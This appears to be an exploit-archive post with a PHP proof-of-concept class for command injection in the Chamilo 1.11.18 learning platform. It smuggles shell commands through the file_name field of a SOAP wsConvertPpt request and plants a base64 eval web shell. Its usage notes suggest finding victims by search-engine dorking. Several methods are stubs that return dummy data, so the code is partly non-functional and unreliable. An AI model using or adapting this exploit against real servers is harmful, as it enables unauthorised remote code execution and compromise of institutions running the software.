Chamilo 1.11.18 Code Injection

=============================================================================================================================================
| # Title : Chamilo 1.11.18 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 123 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class ChamiloExploit {
private $targetUri;
private $webshellName;
private $postParam;

public function __construct($targetUri, $webshell = null) {
$this->targetUri = rtrim($targetUri, ‘/’);
$this->webshellName = $webshell ?: $this->generateRandomWebshellName();
}

private function generateRandomWebshellName() {
return bin2hex(random_bytes(8)) . ‘.php’;
}

private function soapRequest($cmd) {
$pptSize = rand(720, 1440) . ‘x’ . rand(360, 720);
return <<<EOS
<?xml version=”1.0″ encoding=”UTF-8″?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/”
xmlns:ns1=”{$this->targetUri}”
xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”
xmlns:xsd=”http://www.w3.org/2001/XMLSchema”
xmlns:ns2=”http://xml.apache.org/xml-soap”
xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/”
SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”>
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type=”ns2:Map”>
<item>
<key xsi:type=”xsd:string”>file_data</key>
<value xsi:type=”xsd:string”></value>
</item>
<item>
<key xsi:type=”xsd:string”>file_name</key>
<value xsi:type=”xsd:string”>`{{}}`.pptx’|” |{$cmd}||a #</value>
</item>
<item>
<key xsi:type=”xsd:string”>service_ppt2lp_size</key>
<value xsi:type=”xsd:string”>{$pptSize}</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
EOS;
}

public function uploadWebshell() {
$this->postParam = bin2hex(random_bytes(4));

$phpPayload = “<?php @eval(base64_decode(\$_POST[‘{$this->postParam}’]));?>”;
$pngWebshell = $this->injectPhpPayloadPng($phpPayload);

if ($pngWebshell === null) {
return null;
}

$payload = base64_encode($pngWebshell);
$cmd = “echo {$payload}|openssl enc -a -d > ./{$this->webshellName}”;

$response = $this->sendRequest(‘POST’, “/main/webservices/additional_webservices.php”, “text/xml; charset=utf-8”, $this->soapRequest($cmd));
return $response;
}

private function injectPhpPayloadPng($phpPayload) {
// Implement your logic to inject PHP payload into a PNG image
// For demonstration purposes, we’ll return a dummy PNG data
return pack(‘H*’, ‘89504E470D0A1A0A…’); // Example PNG header
}

public function executePhp($cmd) {
$payload = base64_encode($cmd);
$response = $this->sendRequest(‘POST’, “/main/inc/lib/ppt2png/{$this->webshellName}”, “application/x-www-form-urlencoded”, [$this->postParam => $payload]);
return $response;
}

public function executeCommand($cmd) {
$payload = base64_encode($cmd);
$cmd = “echo {$payload}|openssl enc -a -d|sh”;
$response = $this->sendRequest(‘POST’, “/main/webservices/additional_webservices.php”, “text/xml; charset=utf-8”, $this->soapRequest($cmd));
return $response;
}

public function check() {
$marker = bin2hex(random_bytes(4));
$res = $this->executeCommand(“echo {$marker}”);
if ($res && strpos($res, ‘wsConvertPptResponse’) !== false && strpos($res, $marker) !== false) {
return ‘Vulnerable’;
} else {
return ‘Safe’;
}
}

public function exploit($payload) {
switch ($payload[‘type’]) {
case ‘php’:
$res = $this->uploadWebshell();
if (!$res || strpos($res, ‘wsConvertPptResponse’) === false) {
throw new Exception(‘Web shell upload error.’);
}
$this->executePhp($payload[‘encoded’]);
break;
case ‘unix_cmd’:
$this->executeCommand($payload[‘encoded’]);
break;
case ‘linux_dropper’:
// Implement Linux dropper logic
break;
}
}

private function sendRequest($method, $uri, $ctype, $data) {
// Implement your HTTP request logic here (using cURL or similar)
// For demonstration purposes, return a dummy response
return ‘Dummy response’;
}
}

// Usage
$exploit = new ChamiloExploit(‘http://target.com’, ‘webshell.php’);
$exploit->check();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================